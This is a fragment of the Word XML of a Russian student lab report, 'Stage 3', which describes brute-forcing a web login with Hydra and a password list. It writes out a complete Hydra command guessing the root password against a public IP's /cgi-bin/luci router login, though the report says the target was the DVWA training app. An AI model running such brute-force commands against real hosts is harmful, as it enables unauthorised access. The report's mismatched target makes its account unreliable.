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проекту. Этап 3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Использовать Hydra для подбора или взлома имени пользователя и пароля.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 с паролями для взлома веб-приложения DVWA (рис. 1).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="fig:001"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="1534603"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Рис. 1: Файл с пароля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паролями</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В командной строке введем команду</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash hydra -l root -P ~/passwords.txt -o ./hydra_result.log -f -V -s 80 178.72.90.181 http-post-form "/cgi-bin/luci:username=^USER^&amp;password=^PASS^:Invalid username"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и запустим Hydra (рис. 2-3)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="fig:002"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="3733800" cy="753827"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Рис. 2: Запуск Hydr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Hydra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2616229"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Рис. 3: Завершение подбора паро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Завершение подбора пароля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Hydra мы взломали веб-приложение DVWA.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3</dc:title>
  <dc:creator>Морозова Ульяна</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-20T12:56:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-20T12:56:38Z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